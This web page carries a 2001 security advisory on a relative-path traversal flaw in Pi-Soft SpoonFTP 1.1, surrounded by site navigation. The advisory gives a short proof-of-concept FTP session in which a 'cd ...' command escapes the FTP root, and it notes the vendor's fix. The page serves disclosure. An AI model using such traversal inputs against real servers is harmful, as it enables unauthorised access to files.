IT Pro Today is part of the Informa Tech Division of Informa PLC

INFORMA PLC|ABOUT US|INVESTOR RELATIONS|TALENT

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them. Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Documents Online Events Advertise About

Newsletter Sign-Up

Cloud

Recent in Cloud

SEE ALL Cloud

healthcare administrator transferring patient data via cloud computing applications

Cloud Computing

5 Best Practices for Achieving Healthcare Cloud Compliance 5 Best Practices for Achieving Healthcare Cloud Compliance

byChristopher Tozzi

Jul 1, 2024

4 Min Read

business people preparing audio visual presentation on collaboration in conference room

Unified Communications

How OpenAI Could Shape the Next Wave of Collaborative Platforms How OpenAI Could Shape the Next Wave of Collaborative Platforms

byEric Krapf, No Jitter

Jun 28, 2024

3 Min Read

Recent in OS

See All OS

abstract string backgroud

PowerShell

Advanced String Manipulation Techniques in PowerShell Advanced String Manipulation Techniques in PowerShell

byBrien Posey

Jun 28, 2024

3 Min Read

pins with words zero trust on a cybernetic board

Linux OS

How To Implement Zero-Trust Security in Linux Environments How To Implement Zero-Trust Security in Linux Environments

byGrant Knoetze

Jun 26, 2024

8 Min Read

IT Mgmt

Recent in IT Mgmt

See All IT Mgmt

person pressing an "IT" button

IT Management

Well-Intentioned Things IT Leaders Do That Hurt Team Productivity Well-Intentioned Things IT Leaders Do That Hurt Team Productivity

byInformationWeek

Jul 1, 2024

2 Min Read

two workers collaborating on computers

IT Operations

Duplicate Tech: A Bottom-Line Issue Worth Resolving Duplicate Tech: A Bottom-Line Issue Worth Resolving

byIndustry Perspectives

Jul 1, 2024

5 Min Read

Career

Recent in Career

See All Career Mgmt

person pressing an "IT" button

IT Management

Well-Intentioned Things IT Leaders Do That Hurt Team Productivity Well-Intentioned Things IT Leaders Do That Hurt Team Productivity

byInformationWeek

Jul 1, 2024

2 Min Read

worker frustrated by coworker's loud talking on the phone

Career Tips

The New Work Etiquette: If You Can't Spot the Jerk, It Might Be You The New Work Etiquette: If You Can't Spot the Jerk, It Might Be You

byThe Washington Post

Jun 27, 2024

6 Min Read

Storage

Recent in Storage

See All Data Storage

data floating

IT Operations

How IT Operations Can Play a Critical Role in Data Management How IT Operations Can Play a Critical Role in Data Management

byChristopher Tozzi

Jun 21, 2024

4 Min Read

virtual data stack

Data Storage

How to Build a Data Stack That Actually Puts You in Charge of Your Data How to Build a Data Stack That Actually Puts You in Charge of Your Data

byIndustry Perspectives

Jun 14, 2024

8 Min Read

Security

Recent in Security

See All IT Security

suspicious executive checking smart phone sitting on a desk at the office

Data Privacy

Is That App Sketchy? Here Are 3 Easy Ways To Check.Is That App Sketchy? Here Are 3 Easy Ways To Check.

byThe Washington Post

Jul 1, 2024

3 Min Read

aerial view of a car dealership lot

Attacks & Breaches

Hacked Software Firm CDK Expects All Dealers Live by July 4 Hacked Software Firm CDK Expects All Dealers Live by July 4

byBloomberg News

Jul 1, 2024

2 Min Read

Dev

Recent in Dev

See All Software Dev

cloud-native

Cloud Native

How Cloud-Native Development Benefits SaaS How Cloud-Native Development Benefits SaaS

byForrester Blog Network

Jun 28, 2024

3 Min Read

blurred programmer behind screen of code

Software Development Techniques

AI-Assisted Development Tools vs. Low-Code/No-Code: What to Use When AI-Assisted Development Tools vs. Low-Code/No-Code: What to Use When

byChristopher Tozzi

Jun 27, 2024

4 Min Read

Recent in DX

See All Digital Transformation

ChatGPT login screen seen on smartphone and laptop displays.

AI & Machine Learning

OpenAI Releases CriticGPT to Catch Chatbot Hallucinations—Is It Enough?OpenAI Releases CriticGPT to Catch Chatbot Hallucinations—Is It Enough?

byDayneé Alejandra Rosales

Jul 1, 2024

2 Min Read

concept art of autonomous tractor scanning agricultural plot

AI & Machine Learning

Robots, Drones and Driverless Tractors Usher In New Age of Farming Robots, Drones and Driverless Tractors Usher In New Age of Farming

byBloomberg News

Jun 27, 2024

6 Min Read

Infrastructure

Recent in Infrastructure

See All Infrastructure

Arati Prabhakar, director of the White House's Office of Science and Technology Policy

High Performance Computing

Biden’s Science Adviser Explains the New Hard Line on China Biden’s Science Adviser Explains the New Hard Line on China

byThe Washington Post

Jun 4, 2024

7 Min Read

Newsletters
How To…?
Industry Perspectives
Business Resources
Reports/Research
Online Events

Live Events
Videos
White Papers
Advertise With Us
About Us

Resource Library

Vulnerabilities & Threats
IT Security

Pi-Soft SpoonFTP Relative Path Vulnerability

A vulnerability exists in Pi-Soft SpoonFTP 1.1 that lets an attacker use relative paths to break out of an FTP root.

Ken Pfeil

September 20, 2001

2 Min Read

Reported September 20, 2001, byJoe Testa.

VERSION AFFECTED

· Pi-Soft SpoonFTP 1.1 for Windows 2000, Windows NT,Windows Me, and Windows 9x

DESCRIPTION
Avulnerability exists in Pi-Soft SpoonFTP 1.1 that lets an attacker use relativepaths to break out of an FTP root.

DEMONSTRATION

Joe Testa provided the following scenario asproof-of-concept:

>ftplocalhost

Connectedto xxxxxxxx.rh.rit.edu.

220SpoonFTP V1.1

User(xxxxxxxx.rh.rit.edu:(none)): jdog

331Password required.

Password:

230User logged in, proceed.

ftp>pwd

257"/" is current directory.

ftp>cd ...

250CWD command successful.

ftp>pwd

257"/..." is current directory.

ftp>

VENDOR RESPONSE

Thevendor, Pi-Soft Consulting, has releasedversion 1.1.0.1 to fixthis vulnerability.

CREDIT
Discovered by Joe Testa.

About the Author(s)

Ken Pfeil

See more from Ken Pfeil

Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.

Newsletter Sign-Up

Editor's Choice

cybersecurity operator or hacker works with data in dark room

IT Security

Master AI Cybersecurity: Protect and Enhance Your Network Master AI Cybersecurity: Protect and Enhance Your Network

byBrien Posey

May 21, 2024

5 Min Read

business person stamping a document

IT Operations

How to Get Executive Buy-In for IT Projects How to Get Executive Buy-In for IT Projects

byChristopher Tozzi

May 28, 2024

6 Min Read

yellow block stuck in between blue cog wheels

PowerShell

Using ChatGPT as a PowerShell Debugging Tool Using ChatGPT as a PowerShell Debugging Tool

byBrien Posey

Jun 4, 2024

4 Min Read

Related Topics

Recent in Cloud

Related Topics

Recent in OS

Related Topics

Recent in IT Mgmt

Related Topics

Recent in Career

Related Topics

Recent in Storage

Related Topics

Recent in Security

Related Topics

Recent in Dev

Related Topics

Recent in DX

Related Topics

Recent in Infrastructure

Related Topics

Pi-Soft SpoonFTP Relative Path Vulnerability

About the Author(s)

Editor's Choice